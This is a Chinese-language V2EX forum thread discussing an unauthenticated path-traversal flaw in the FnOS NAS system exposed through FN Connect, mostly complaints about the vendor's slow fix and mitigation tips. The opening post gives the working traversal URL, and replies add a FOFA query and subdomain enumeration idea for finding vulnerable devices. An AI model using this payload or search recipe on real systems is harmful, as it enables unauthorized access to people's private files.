飞牛这个漏洞 POC 太容易了啊

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

› RANDOM.org 密码生成器

› uBlock

› Authy

› LastPass

› FreebuF.com

› Beebeeto

› Dashlane 密码管理器

打开 FN Connect 随便输入一个 id ，只要撞上了能打开登录页，加上

/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../

直接就到 /了啊

太离谱了

漏洞

登录页

42 条回复 • 2026-02-02 14:50:09 +08:00

stinkytofux

1 月 31 日

0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.

Tink

PRO

1 月 31 日

@stinkytofux 官方为什么不强推新版本呢，强制修复漏洞

Joming

1 月 31 日

TMD 到现在都没发公告！好在公司发现比较早，不然严重泄露信息！再不会用了！

wfhtqp

1 月 31 日

问题是飞牛不当回事，fnid 现在还不暂停，原来没有公网的也全暴漏了

wfhtqp

1 月 31 日

https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。

YJBZC

1 月 31 日

@wfhtqp 我草，飞牛官方团队在一个多月前就知道这个漏洞了，到今天都没发个公告或者强制更新修复

wfhtqp

2 天前

@YJBZC 这才哪到哪？ fn connect 还开着呢

labubu

2 天前 via Android

不是绑定手机了吗，打电话发短信给用户呗？

bitkuang

2 天前 via Android

没复现出来，还有别的条件吧

haoshuaiwang

2 天前

写个脚本跑就行了

{fnid}.fnos.net

baton

2 天前 via Android

经历过宝塔后就不敢用国内这些面板，安全性是个大问题

a9htdkbv

2 天前 via Android

还好我有先见之明，昨天早上关闭 fn connect ，晚上就把整个飞牛虚拟机扬了

emoker

2 天前

@baton 请教宝塔具体是啥问题？之前没关注过

AkinoKaedeChan

2 天前 via Android

@emoker https://www.bt.cn/bbs/thread-54666-1-1.html phpMyAdmin 未授权访问

flyqie

2 天前 via Android

是的，之前以为飞牛官方会做紧急的限制，现在看来似乎没有任何限制，不知道是限于架构问题做不了还是不想做。

yinanc

2 天前

@flyqie 估计就国内处理问题的一贯思路，装死等这波舆论过去了，就可以当没有发生了

emoker

2 天前

@AkinoKaedeChan 感谢大佬

stinkytofux

2 天前

ryd994

2 天前 via Android

我相信有很多人就是图个 fnconnect 的方便。这下好了，不能开公网，不能用 fnconnect ，结果还是要自己配置 VPN/zerotier 。

我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问，后者经过 zero trust 的鉴权。所有不登入就能访问的服务（比如 BT ）都跑在容器里。

hanguofu

1 天前

@ryd994 : 请问你是自己买了一个域名并用 cf 代理吗？

sardina

1 天前

2025-12-25 18:06:25 只看该作者回复
感谢反馈我转给负责的同事看看
一个月前就说反馈结果还没修复。。。

Curtion

1 天前

还真是，直接在 fofa 搜索 5666 端口，随便找一个进去就能访问到文件了。。我觉得飞牛应该强制关闭 fn connet ，直到用户升级系统。

MiKing233

1 天前

@flyqie 说做不了是不可能的, 哪怕临时停止解析 5ddd.com 这种 FN Connect 域名也可以尽可能减少漏洞利用范围, 我真没看明白他们除了在论坛发帖忽悠小白之外究竟还采取了哪些主动的安全挽救措施

MiKing233

1 天前

@flyqie 以及漏洞被大规模利用已经过去超过了一天一夜, 我不知道他们公司的老板和法人是怎么睡得着觉的

panda188

1 天前 via Android

不会降本增效，已经把负责这个，会这个的裁了吧？

hatch

1 天前

作死💊，估计内部也一团糟，问题流转半天找不到能挑担的人

bluekz

1 天前

@wfhtqp #4 啊？不打开 fn connect 和 ddns 等任何外网方式也能暴露什么？

povsister

1 天前

好几天了官方反代甚至不愿意上个 WAF 救一救后面的用户。哎

chinni

1 天前

其实现在点什么目录基本都 404 也没啥了，但是确实坑，不如直接用 zero trust

Tink

PRO

1 天前

@chinni 点链接没用的，手拼目录名到 url 可以

quu

1 天前

@Curtion fofa 可以再精准点

(port="5666")&& icon_hash="470295793" icon + 端口验证

someonesnone

1 天前

@chinni #29 你别直接点链接, 你把目录名手动放在../../xxx 试试...

ritziiiiii

1 天前 via Android

不开 Fn Connect ，只开 ipv6 公网和 ssh ，
而且也把后缀 5666 ，5667 改了，ssh 的 22 也改了，这样还会出现问题吗？
还有要不要进 PE 扫硬盘上的毒啊？

alenchen

1 天前

自己 ddns 的不香吗？非要走别人家里再回来

crc8

23 小时 24 分钟前

@someonesnone 不堪入目

Tink

PRO

23 小时 22 分钟前

@alenchen #34 没什么用，这次这个 poc 是无差别的

jpyl0423

23 小时 21 分钟前

@alenchen #34 自己的也一样

taliove

22 小时 58 分钟前

自己的飞牛也试了一下，升到 18 版本后显示 404 了。不升级的话仍然可以访问。飞牛这一波闹大了。

Rorysky

21 小时 50 分钟前

@stinkytofux 0day 都被人大规模发出来了，还叫 0day 么？ 0day 准确是指开发者都不知道漏洞，在软件更新前，搞得飞牛是个很厉害的软件系统似的。本质就是个 web 后台

Valid

21 小时 14 分钟前

fn 完全可以直接拦截这个 url ，我不理解

thevita

19 小时 36 分钟前

我的观点有点极端，以“体验”为核心卖点的产品，其安全性都要深入考验（但其实也没啥好办法，一般就看看对方安全负责人是谁）
1. 大概 8-9 年前小米的路由也很多这种弱智漏洞，给 src 还给了我几千块钱，基于 luci, 感觉是 lua 生态的缺乏，很多东西的实现靠手写，但写得太糙了，后来应该是安全部门介入，加了很多安全措施
2. 去年 RSC/nextjs 的漏洞也很离谱，好在处理没 fn 这么离谱，刚看说社区一个月前就有人发现了

rayyume

19 小时 20 分钟前

没用过飞牛，用的 lucky 反代高位端口+cloudflare 开启 https+规则端口转发，应该还算安全吧？